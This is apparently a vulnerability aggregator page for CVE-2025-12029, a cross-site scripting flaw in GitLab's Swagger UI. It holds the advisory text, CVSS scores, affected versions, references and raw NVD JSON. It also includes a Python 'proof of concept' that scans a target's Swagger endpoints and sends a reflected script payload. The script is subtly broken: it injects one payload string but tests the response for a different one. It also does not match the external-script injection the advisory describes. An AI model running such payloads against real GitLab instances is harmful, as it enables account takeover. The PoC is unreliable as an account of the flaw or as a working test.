CVE-2025-12029

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.11 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have, under certain circumstances, allowed an unauthenticated user to perform unauthorized actions on behalf of another user by injecting malicious external scripts into the Swagger UI."

CVSS Details

CVSS Score

8.0

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE

GitLab CE/EE 15.11 至 18.4.6之前的所有版本

GitLab CE/EE 18.5 至 18.5.4之前的所有版本

GitLab CE/EE 18.6 至 18.6.2之前的所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import re

# CVE-2025-12029 PoC - GitLab Swagger UI XSS
# Target: GitLab instances with Swagger UI enabled

def check_vulnerability(target_url):
    """Check if target GitLab instance is vulnerable"""
    vulnerable_endpoints = [
        "/api-docs",
        "/swagger",
        "/swagger-ui",
        "/api/v4/swagger"
    ]
    
    xss_payload = '<script>alert("XSS CVE-2025-12029")</script>'
    
    for endpoint in vulnerable_endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            response = requests.get(url, timeout=10)
            if response.status_code == 200:
                # Check if Swagger UI reflects input without sanitization
                if 'swagger' in response.text.lower():
                    print(f"[+] Swagger UI found at: {url}")
                    # Inject XSS payload
                    xss_url = url + f"?url=<script>alert('XSS')</script>"
                    xss_response = requests.get(xss_url, timeout=10)
                    if xss_payload in xss_response.text:
                        print(f"[!] VULNERABLE: XSS payload reflected at {xss_url}")
                        return True
        except requests.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")
    return False

# Example usage
# target = "https://gitlab.example.com"
# check_vulnerability(target)

# Note: This PoC demonstrates the vulnerability concept.
# Actual exploitation requires specific conditions and user interaction.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12029
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12029
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12029/
[4] VulDB https://vuldb.com/cve/CVE-2025-12029
[5] https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/issues/577975
[7] https://hackerone.com/reports/3317485

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12029", "sourceIdentifier": "[email protected]", "published": "2025-12-11T08:15:47.853", "lastModified": "2025-12-23T21:01:56.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.11 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have, under certain circumstances, allowed an unauthenticated user to perform unauthorized actions on behalf of another user by injecting malicious external scripts into the Swagger UI.\""}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "15.11.0", "versionEndExcluding": "18.4.6", "matchCriteriaId": "91412C68-DC13-44A6-B63E-77899AA6AF82"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "15.11.0", "versionEndExcluding": "18.4.6", "matchCriteriaId": "B3283CA0-78EA-4D53-92B4-B3DBF4BDB430"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.4", "matchCriteriaId": "457DB333-60BE-44CD-A674-216AB658E14E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.4", "matchCriteriaId": "910967DB-0A8C-4436-9D9E-37BD610E7367"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.2", "matchCriteriaId": "919A2588-3EA1-4E15-B47E-61B3E14B2781"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.2", "matchCriteriaId": "6343A083-3E1C-4551-B230-76CABC3FDD67"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/577975", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3317485", "source": "[email protected]", "tags": ["Permissions Required"]}]}}